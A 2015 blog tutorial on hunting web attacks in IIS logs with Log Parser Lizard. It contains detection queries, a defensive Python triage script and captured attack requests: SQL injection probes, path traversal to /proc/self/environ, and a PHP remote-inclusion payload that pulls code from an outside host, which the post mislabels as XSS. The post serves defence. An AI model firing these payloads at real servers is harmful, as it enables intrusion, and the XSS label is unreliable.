Monday, January 12, 2015

How to use Log Parser Lizard




Log Parser Lizard, a GUI for Microsoft Log Parser (http://www.lizard-labs.com/log_parser_lizard.aspx), is a versatile tool that gives quick access to log files, XML files, CSV files and other data sources on the Microsoft Windows operating system. Businesses already running Log Parser can use this query front end to find exactly what they need, when they need it.




1) Click the “IIS logs” button.
2) Click the “Attacks” link.
3) Edit line 3 of the query so the path points to your log folder. Keep the format and do not forget the trailing \*.log' at the end of the line.
4) Click the “Run Query” button.

Predefined Queries


The following queries, and what each one is for, are the ones we use to analyse the logs:

Main query used for most attacks:

This query covers the following attacks: directory discovery, XSS, XSF, SQL injection and command injection. The PHP part catches all attacks aimed at PHP technology. We monitor these too, because attackers who notice that the technology is different may develop a new attack against it.

SELECT date AS Date, c-ip AS IP, cs-uri-stem AS URL_Address, cs-uri-query AS Attack_Details,
       COUNT(*) AS Attempts
FROM 'C:\IIS Logs\Logs\*.log'
WHERE (cs-uri-query LIKE '%./%') OR (cs-uri-query LIKE '%.php%') OR (cs-uri-query LIKE '%//.%')
   OR (cs-uri-query LIKE '%src=http%') OR (cs-uri-query LIKE '%src=ftp%') OR (cs-uri-query LIKE '%l=ftp://%')
   OR (cs-uri-query LIKE '%l=http://%') OR (cs-uri-query LIKE '%SELECT%') OR (cs-uri-stem LIKE '%.php%')
GROUP BY date, c-ip, cs-uri-stem, cs-uri-query
ORDER BY date, c-ip, cs-uri-query

SQL injection attempts (by tool user agent):

SELECT date AS Date, c-ip AS IP, cs-uri-query AS Query_Made, cs(User-Agent) AS Browser, COUNT(*) AS Attempts
FROM 'C:\IIS Logs\Logs\*.log'
WHERE cs(User-Agent) LIKE '%sql%'
GROUP BY date, c-ip, cs-uri-query, cs(User-Agent)
ORDER BY date, c-ip, cs-uri-query

Query details:

· (cs-uri-query LIKE '%./%') – matches the “./” pattern (“%” means “any characters”) – directory discovery.
· (cs-uri-query LIKE '%.php%') – matches any record containing “.php” – any PHP-related attack.
· (cs-uri-query LIKE '%//.%') – matches the “//.” pattern – directory discovery.
· (cs-uri-query LIKE '%src=http%') – XSS.
· (cs-uri-query LIKE '%src=ftp%') – XSS.
· (cs-uri-query LIKE '%l=ftp://%') – XSS.
· (cs-uri-query LIKE '%l=http://%') – XSS.
· (cs-uri-query LIKE '%SELECT%') – SQL injection.





1) Click “Export to Excel”.
2) Choose a location.
3) Click “Save”.

After that you can perform the log analysis and write the report.

WW3 Log Analysis




When you look through the logs there is a pattern of normal activity. You will easily find that pattern just by scrolling through the logs. On some servers it looks like this.

2012-08-31 00:00:13 198.103.***.**GET /RIR_RDI/index_e.aspx n=y 8080 - 173.44.37.226 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.3)+Gecko/20090824+Firefox/3.5.3+GTB5 200 0 0 234
2012-08-31 00:00:13 198.103.***.**POST /RIR_RDI/index_e.aspx n=y 8080 - 173.44.37.226 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.3)+Gecko/20090824+Firefox/3.5.3+GTB5 302 0 0 124
2012-08-31 00:00:13 198.103.***.**GET /error/GenericErrorPage.htm aspxerrorpath=/RIR_RDI/index_e.aspx 8080 - 173.44.37.226 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.3)+Gecko/20090824+Firefox/3.5.3+GTB5 404 0 2 46
2012-08-31 00:01:38 198.103.***.**GET /RIR_RDI/RIR_RDI.aspx id=452642&l=e 8080 - 59.167.198.149 Mozilla/5.0+(Windows+NT+6.0;+WOW64;+rv:14.0)+Gecko/20100101+Firefox/14.0.1 200 0 0 1060
2012-08-31 00:01:40 198.103.***.**POST /Reflex/index_f.aspx - 8080 - 74.14.188.98 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0;+BTRS122412;+GTB7.4;+EasyBits+GO+v1.0;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.4506.2152;+.NET+CLR+3.5.30729;+InfoPath.2;+AskTbORJ/5.13.1.18107) 200 0 0 608
2012-08-31 00:01:40 198.103.***.**GET /style/header.css - 8080 - 74.14.188.98 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0;+BTRS122412;+GTB7.4;+EasyBits+GO+v1.0;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.4506.2152;+.NET+CLR+3.5.30729;+InfoPath.2;+AskTbORJ/5.13.1.18107) 304 0 0 78
2012-08-31 00:01:40 198.103.***.**GET /style/footer.css - 8080 - 74.14.188.98 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0;+BTRS122412;+GTB7.4;+EasyBits+GO+v1.0;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.4506.2152;+.NET+CLR+3.5.30729;+InfoPath.2;+AskTbORJ/5.13.1.18107) 304 0 0 46
2012-08-31 00:01:40 198.103.***.**GET /style/refinfo.css - 8080 - 74.14.188.98 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0;+BTRS122412;+GTB7.4;+EasyBits+GO+v1.0;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.4506.2152;+.NET+CLR+3.5.30729;+InfoPath.2;+AskTbORJ/5.13.1.18107) 200 0 0 31
2012-08-31 00:01:40 198.103.***.**GET /style/common.css - 8080 - 74.14.188.98

This normal traffic contains the date, time, server IP, request details, remote host IP, and details of the client application and OS used.
As we scroll further down the logs, we can see different types of attacks.

Sample of a SQL injection attack

Performed to verify the security of the web site:

2012-07-18 17:29:33 198.103.***.**GET /RIR_RDI/index_e.aspx - 8080 - 198.103.148.111 sqlmap/1.0-dev+(r4766)+(http://www.sqlmap.org) 200 0 0 46
2012-07-18 17:29:34 198.103.***.**GET /RIR_RDI/index_e.aspx - 8080 - 198.103.148.111 sqlmap/1.0-dev+(r4766)+(http://www.sqlmap.org) 200 0 0 31
2012-07-18 17:29:50 198.103.***.**GET /RIR_RDI/index_e.aspx n=y 8080 - 198.103.148.111 sqlmap/1.0-dev+(r4766)+(http://www.sqlmap.org) 200 0 0 46
2012-07-18 17:29:51 198.103.***.**GET /RIR_RDI/index_e.aspx n=y 8080 - 198.103.148.111 sqlmap/1.0-dev+(r4766)+(http://www.sqlmap.org) 200 0 0 15
2012-07-18 17:29:51 198.103.***.**GET /RIR_RDI/index_e.aspx n=4853 8080 - 198.103.148.111 sqlmap/1.0-dev+(r4766)+(http://www.sqlmap.org) 200 0 0 31
2012-07-18 17:29:52 198.103.***.**GET /RIR_RDI/index_e.aspx n=y%22%29%28%29%22%22%29%28%22%22 8080 - 198.103.148.111 sqlmap/1.0-dev+(r4766)+(http://www.sqlmap.org) 200 0 0 15
2012-07-18 17:29:52 198.103.***.**GET /RIR_RDI/index_e.aspx n=y%29%20AND%201249%3D9782%20AND%20%288697%3D8697 8080 - 198.103.148.111 sqlmap/1.0-dev+(r4766)+(http://www.sqlmap.org) 200 0 0 15

Let’s make a short analysis of this injection:

2012-07-18 17:29:52 198.103.***.**GET /RIR_RDI/index_e.aspx n=y%22%29%28%29%22%22%29%28%22%22 8080 - 198.103.148.111sqlmap/1.0-dev+(r4766)+(http://www.sqlmap.org)200 0 0 15


- The first highlighted part (the query string) is the injection attempt, the second highlighted part is the IP address, and the third part is the tool details.
The first part is always present and is the main evidence that a SQL injection was attempted.
- The second part is the IP address. We copy this IP address and check where it is located - http://www.iplocation.net/.
The location helps to tell whether it was an internal test or vulnerability assessment. If the location is outside YOUR network, then we should start an investigation into whether this attack penetrated our web site.
- For the investigation we use dedicated computers with the BackTrack distribution installed, and with SQLMAP we try to repeat the SQL injection to see whether our application or network is vulnerable to such an attack.


Keep in mind that this is just one sample attack and that some attacks can look different.

For other attacks, record what they look like, how they differ from the normal pattern, and the IP location.

One sample from the application event logs shows what was a potential attack:

Exception information:     Exception type: HttpRequestValidationException    Exception message: A potentially dangerous Request.Form value was detected from the client (txtFulltext=""...jsc.djts, <a href=""http://qual...""). Request information:     Request URL: http://www.***.***:8080/RIR_RDI/index_e.aspx?n=y     Request path: /RIR_RDI/index_e.aspx     User host address: 96.47.225.66     User:      Is authenticated: False     Authentication Type:      Thread account name: IIS APPPOOL\CLFApps

You can see that the exception message says “A potentially dangerous Request... value was detected”. Searching for it on google.com shows that it relates to form security in .NET. But we must be sure that it is not a repeated attempt to penetrate the web site. Unfortunately, without a sniffer we cannot see the whole URL (href=”http://qual...””), so we need to cross-search the other logs for the same time. In this case a simple Google search shows that this IP address has been reported as a spam bot that tries to submit messages through forms. As our web site has a form, the spam bot automatically tries to post something there.

Sample of XSS (Cross-Site Scripting), sometimes written CSS


2012-08-16 03:40:25 198.103.***.**GET /RIR_RDI/lib/adodb_lite/adodb-perf-module.inc.php last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=test?? 8080 - 203.198.154.105 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6 404 0 2 249
2012-08-16 03:40:26 198.103.***.**GET /RIR_RDI/lib/adodb_lite/adodb-perf-module.inc.php last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://versatilityinprint.co.uk/osc/extras/Program_Files/daster.jpg?? 8080 - 203.198.154.105 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6 404 0 2 249
2012-08-16 03:40:28 198.103.***.**GET /lib/adodb_lite/adodb-perf-module.inc.php last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=test?? 8080 - 203.198.154.105 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6 404 0 2 249
2012-08-16 03:40:29 198.103.***.**GET /lib/adodb_lite/adodb-perf-module.inc.php last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://versatilityinprint.co.uk/osc/extras/Program_Files/daster.jpg?? 8080 - 203.198.154.105


SQL injection:

2012-09-05 18:18:45 198.103.***.**GET /RIR_RDI/RIR_RDI.aspx id=454036&l=e%27%60%28%5B%7B%5E%7E 8080 - 125.41.176.49 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 0 483
2012-09-05 18:18:45 198.103.***.**GET /RIR_RDI/RIR_RDI.aspx id=454036&l=e%20aND%208%3D8 8080 - 125.41.176.49 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 0 405
2012-09-05 18:18:46 198.103.***.**GET /RIR_RDI/RIR_RDI.aspx id=454036&l=e%20aND%208%3D3 8080 - 125.41.176.49 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 0 499
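The triage steps listed under the sqlmap sample (pull out the injected query, the source IP and the tool, then decide whether the source is inside your own network) and the paired 8=8 / 8=3 probes just shown can be scripted. The Python below is an added example, not the author's procedure or any tool from the page: it decodes the query string so the analyst sees what the server actually parsed, names the tool from the user agent (only sqlmap appears on this page), checks the client IP against your own ranges with the standard ipaddress module, and flags a client that sent both a true and a false numeric comparison to the same page, which is the shape of the SQL injection sample above. The 198.103.0.0/16 range stands in for the page's masked server network and 10.0.0.5 for the masked server address; both are constructed placeholders, and the page's iplocation.net lookup is left to the analyst since it needs the network.

```python
import ipaddress
import re
from urllib.parse import unquote

# Ranges that count as "YOUR network" (constructed placeholder; put your own ranges here).
OWN_NETWORKS = [ipaddress.ip_network("198.103.0.0/16")]

# Tool signatures recognised in cs(User-Agent); sqlmap is the only one quoted on the page.
SCANNER_SIGNATURES = {"sqlmap": "sqlmap"}

# A numeric comparison after AND/OR in the decoded query, e.g. "aND 8=8" or "AND 1249=9782".
COMPARISON = re.compile(r"\b(?:and|or)\b\s*\(?\s*(\d+)\s*=\s*(\d+)", re.IGNORECASE)

# Constructed sample lines copied from the page with the server address replaced by 10.0.0.5.
SAMPLE_LINES = [
    "2012-07-18 17:29:52 10.0.0.5 GET /RIR_RDI/index_e.aspx n=y%29%20AND%201249%3D9782%20AND%20%288697%3D8697 8080 - 198.103.148.111 sqlmap/1.0-dev+(r4766)+(http://www.sqlmap.org) 200 0 0 15",
    "2012-09-05 18:18:45 10.0.0.5 GET /RIR_RDI/RIR_RDI.aspx id=454036&l=e%20aND%208%3D8 8080 - 125.41.176.49 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 0 405",
    "2012-09-05 18:18:46 10.0.0.5 GET /RIR_RDI/RIR_RDI.aspx id=454036&l=e%20aND%208%3D3 8080 - 125.41.176.49 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 0 499",
]


def split_line(line):
    """Field positions assume the page's order: date time s-ip method stem query port user c-ip agent status ..."""
    p = line.split()
    return {"date": p[0], "time": p[1], "stem": p[4], "query": p[5],
            "c_ip": p[8], "agent": p[9], "status": p[10]}


def triage(line):
    """The three parts the page highlights, plus the internal/external decision."""
    r = split_line(line)
    ip = ipaddress.ip_address(r["c_ip"])
    tool = next((name for sig, name in SCANNER_SIGNATURES.items()
                 if sig in r["agent"].lower()), None)
    return {
        "decoded_query": unquote(r["query"]),   # what the application saw, not the %XX form
        "source_ip": r["c_ip"],
        "internal": any(ip in net for net in OWN_NETWORKS),
        "tool": tool,
        "status": r["status"],
    }


def boolean_probe_pairs(lines):
    """Clients that sent both a true (n=n) and a false (n=m) comparison to the same page."""
    seen = {}
    for line in lines:
        r = split_line(line)
        m = COMPARISON.search(unquote(r["query"]))
        if not m:
            continue
        truth = "true" if m.group(1) == m.group(2) else "false"
        seen.setdefault((r["c_ip"], r["stem"]), set()).add(truth)
    return sorted(key for key, truths in seen.items() if truths == {"true", "false"})


if __name__ == "__main__":
    for line in SAMPLE_LINES:
        print(triage(line))
    print("boolean probe pairs:", boolean_probe_pairs(SAMPLE_LINES))
```

On the sample, the sqlmap line decodes to a readable `n=y) AND 1249=9782 AND (8697=8697`, comes from inside the placeholder network and names its tool, so it fits the page's "internal test or VA" case; the two RIR_RDI.aspx requests come from outside, carry no tool name, and are reported as a true/false pair, which is the signal to investigate further.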

Possible directory enumeration attack:

2012-08-22 12:37:56 198.103.***.**GET /RIR_RDI/index.php option=com_acctexp&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ00 8080 - 195.114.19.111 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6 404 0 2 109
2012-08-22 12:37:56 198.103.***.**GET /index.php option=com_acctexp&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ00 8080 - 195.114.19.111 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6 404 0 2 109
2012-08-22 12:37:57 198.103.***.**GET /RIR_RDI/index.php option=com_acctexp&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ00 8080 - 91.121.115.109 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6 404 0 2 78
2012-08-22 12:37:57 198.103.***.**GET /index.php option=com_acctexp&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ00 8080 - 91.121.115.109 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6 404 0 2 78



